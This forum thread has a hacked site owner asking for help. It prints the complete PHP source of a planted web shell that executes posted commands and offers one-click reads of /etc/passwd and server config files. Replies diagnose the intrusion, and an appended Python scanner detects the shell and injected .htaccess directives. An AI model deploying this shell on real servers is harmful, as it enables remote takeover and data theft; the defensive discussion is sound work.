
Strange php code found on my website


newbtophp


I got hacked and the following code was placed within my files:

 

<?
/*
Coded by Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalıştır" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>Hızlı Menü :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tüm Açık Portaları Gör</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Göster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuçları:</font></b><br>";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?> 

 

How would I patch this? Like, is there any code I can add to a global file to prevent this "safemode bypass"?

 


It looks like:

 

http://securityvulns.com/news/PHP/htacces/safemodebypas.html

 

http://jolmos.blogspot.com/2008/02/php-safemode-bypass-cve-2007-3378.html

 

EDIT: After googling I found a site suggesting a solution:

 

"Disable the error_log function via the disable_functions directive if the safe mode protection is required. This may impact functionality. All software vendors (including open source developers) should audit their source.

via Secunia"

 

http://blog.taragana.com/index.php/archive/php-safe-mode-bypass-weakness-uncovered-in-error_log/

 

But not sure?  :-\


You said this chunk of code was placed within your files, correct? Now, were these files that had been uploaded to your server lately, or how did these files get to your server?

 

It's either an insecure connection via FTP or another uploading process, or your files might be writeable on the server.

 

Check the CHMOD of your folders/files and change your passwords on your account.

 

I'm trying to help .. I've seen this before .. therefore, a comment like this:

 

No, I wouldn't upload a shell to my site; why would I want to exploit my site?

 

won't get you help, since I'm quite sure you don't want to exploit your own site .. think, "how can I offer more insight into MY issue at hand", rather than making quips.

 

Patching it is one thing, but actually resolving the reason this was injected in the first place is what is really important.



 

Sorry, I'm just panicking. I've reset my cp pass, and also cleared my site and reinstalled a fresh backup.

 

I found the code within a file named liz0.php (I've never seen this file before, and never uploaded it) within a subdirectory which also contains an error_log and a file named c99.txt. (I tried posting that file here, but my antivirus won't allow it.)

 

After some research (see my above post), I've realised the hacker/s got access to my site by a PHP safe mode bypass vulnerability.

 

I'm on shared hosting and these are the properties:

 

Apache version 1.3.41 (Unix)

PHP version 5.2.9

Operating system Linux

 


the following code was placed within my files

I found the code within a file named liz0.php (i've never seen this file before, and never uploaded it)
Then the file where you found that code is not YOUR (my) file; it is a file that is not one of yours. Providing relevant information like you just posted saves a lot of time in finding the actual problem, and you should have included it in your first post.

 

That file did not necessarily get where it is because of a safe mode problem. Is the safe_mode setting even ON? What does a phpinfo() statement show for safe_mode?

 

The links you found and posted above probably don't even apply. Is there anything in a .htaccess file that you did not put in it, and is your code even using the PHP error_log function?

 

It is more likely that you have an upload feature on your site and that your upload form processing code is allowing an uploaded file to be put anywhere that PHP has access to, and/or you actually have another .php file somewhere that was uploaded and was used to put the file you did find where you found it.


I do have an upload form, but it doesn't store any files; it just uses the PHP tmp (temporary) directory and the unlink() function.

 

In my .htaccess there's the following code:

 

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

 

I don't remember putting that in there; my .htaccess was empty, so this had to be the cause of that.
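Added here as a defender's example, not code from the thread or from the shell's author: a Python scan that looks for the hallmarks of the file posted in the first post (ini_restore on safe_mode, a request parameter fed to one of the execution functions the shell falls back through) and for .htaccess directives like the ones found in this post, plus a check that a php.ini disable_functions line covers the shell's whole fallback chain rather than just exec. The indicator names, the sample web root and the ini lines are constructed.

```python
import re
import tempfile
from pathlib import Path
# Execution functions the posted shell tries, in its fallback order.
EXEC_CHAIN = ["exec", "shell_exec", "system", "passthru", "popen"]
# Textual hallmarks of the posted shell (constructed signatures, not a vendor feed).
PHP_INDICATORS = {
    "ini_restore": re.compile(r"ini_restore\s*\(\s*['\"](?:safe_mode|open_basedir)"),
    "exec_call": re.compile(r"\b(?:%s)\s*\(" % "|".join(EXEC_CHAIN)),
    "request_input": re.compile(r"\$_(?:POST|GET|REQUEST)\s*\["),
}
# .htaccess directives of the kind the OP found without having added them (SSI, handlers).
HTACCESS_INDICATOR = re.compile(
    r"^\s*((?:Options\b.*\bIncludes\b|AddHandler\b|AddType\b).*)$", re.I | re.M)

def scan_tree(root, min_hits=2):
    """Map relative path -> matched indicators for every suspicious file under root."""
    root, findings = Path(root), {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="replace")
        if path.name == ".htaccess":
            hits = HTACCESS_INDICATOR.findall(text)
        else:  # scan every file, whatever its suffix: the thread's c99 copy sat in a .txt
            hits = [n for n, rx in PHP_INDICATORS.items() if rx.search(text)]
            hits = hits if len(hits) >= min_hits else []
        if hits:
            findings[path.relative_to(root).as_posix()] = [h.strip() for h in hits]
    return findings

def uncovered_exec_functions(php_ini_text):
    """Fallback functions that a php.ini disable_functions line still leaves callable."""
    m = re.search(r"^\s*disable_functions\s*=\s*(.*)$", php_ini_text, re.M)
    disabled = {f.strip() for f in m.group(1).split(",")} if m else set()
    return [f for f in EXEC_CHAIN if f not in disabled]

def demo():
    # Constructed web root mirroring the thread's layout; returns the three results.
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text('<?php echo "hello"; ?>\n')
    (root / "uploads").mkdir()
    # Stand-in for liz0.php: same ini_restore + POST-to-exec pattern as the posted file.
    (root / "uploads" / "liz0.php").write_text(
        '<?php ini_restore("safe_mode");\nif($_POST["baba"]!="") { @exec($_POST["baba"], $r); }\n')
    (root / "uploads" / ".htaccess").write_text(
        "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml\n")
    partial_ini = "disable_functions = exec,shell_exec\n"  # leaves the shell's fallbacks open
    full_ini = "disable_functions = exec,shell_exec,system,passthru,popen,proc_open\n"
    return scan_tree(root), uncovered_exec_functions(partial_ini), uncovered_exec_functions(full_ini)
```

Only files matching at least two indicators are reported, which keeps ordinary PHP that merely calls system() out of the list; treat a hit as something to inspect, not proof of compromise.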

 

